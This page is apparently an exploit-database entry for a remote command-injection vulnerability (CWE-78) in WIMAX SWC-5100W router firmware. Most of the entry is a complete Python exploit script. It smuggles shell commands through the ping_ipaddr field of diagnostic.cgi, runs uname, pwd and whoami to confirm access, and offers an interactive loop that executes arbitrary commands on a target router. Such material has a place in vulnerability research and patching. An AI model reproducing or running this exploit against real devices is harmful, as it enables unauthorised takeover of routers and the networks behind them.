WIMAX SWC-5100W Remote Command Execution

2023.04.06
Credit: Momen Eldawakhly
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

# Exploit Title: WIMAX SWC-5100W Firmware V(1.11.0.1 :1.9.9.4) - Authenticated RCE # Vulnerability Name: Ballin' Mada # Date: 4/3/2023 # Exploit Author: Momen Eldawakhly (Cyber Guy) # Vendor Homepage: http://www.seowonintech.co.kr/eng/main # Version: Bootloader(1.18.19.0) , HW (0.0.7.0), FW(1.11.0.1 : 1.9.9.4) # Tested on: Unix # CVE : Under registration import requests import random,argparse import sys from colorama import Fore from bs4 import BeautifulSoup red = Fore.RED green = Fore.GREEN cyan = Fore.CYAN yellow = Fore.YELLOW reset = Fore.RESET argParser = argparse.ArgumentParser() argParser.add_argument("-t", "--target", help="Target router") argParser.add_argument("-rv", "--reverseShell", help="Obtain reverse shell", action='store_true') argParser.add_argument("-tx", "--testExploit", help="Test exploitability", action='store_true') args = argParser.parse_args() target = args.target rev = args.reverseShell testX = args.testExploit banner = """ ____ ____ ____ ____ ____ ____ ____ _________ ____ ____ ____ ____ ||B |||a |||l |||l |||i |||n |||' ||| |||M |||a |||d |||a || ||__|||__|||__|||__|||__|||__|||__|||_______|||__|||__|||__|||__|| |/__\|/__\|/__\|/__\|/__\|/__\|/__\|/_______\|/__\|/__\|/__\|/__\| RCE 0day in WIMAX SWC-5100W [ Spell the CGI as in Cyber Guy ] """ def checkEXP(): print(cyan + "[+] Checking if target is vulnerable" + reset) art = ['PWNED_1EE7', 'CGI AS IN CYBER GUY'] request = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo 'PUTS("+random.choice(art)+")';", proxies=None) if request.status_code == 200: print(green + "[+] Status code: 200 success" + reset) soup = BeautifulSoup(request.text, 'html.parser') if soup.get_text(" ").find("PWNED_1EE7") < 0 or soup.get_text(" ").find("CGI AS IN CYBER GUY"): print(green + "[+] Target is vulnerable" + reset) uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='pwned'>[*] Kernel: `uname+-a` -=-=- [*] Current directory: `pwd` -=-=- [*] User: `whoami`</a>\";") soup_validate = BeautifulSoup(uname.text, 'html.parser') print(soup_validate.find(id="pwned").text) else: print(red + "[+] Seems to be not vulnerable" + reset) else: print(red + "[+] Status code: " + str(request.status_code) + reset) def revShell(): cmd = input("CGI #:- ") while cmd: try: print(cmd) uname = requests.get(url = f"http://{target}/cgi-bin/diagnostic.cgi?action=Apply&html_view=ping&ping_count=10&ping_ipaddr=;echo+\"<a+id='result'>`{cmd}`</a>\";") resp = BeautifulSoup(uname.text, 'html.parser') print(resp.find(id="result").text) if cmd == "exit" or cmd == "quit": print(yellow + "[*] Terminating ..." + reset) sys.exit(0) else: return revShell() except KeyboardInterrupt: sys.exit(0) def help(): print( """ [+] Example: python3 pwnMada.py -t 192.168.1.1 -rv [*] -t, --target :: Specify target to attack. [*] -rv, --reverseShell :: Obtain reverse shell. [*] -tx, --testExploit :: Test the exploitability of the target. [*] -fz, --fuzz :: Fuzz the target with arbitrary chars. """ ) if target and rev: print(banner) revShell() elif target and testX: print(banner) checkEXP() else: print(banner) argParser.print_help()


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top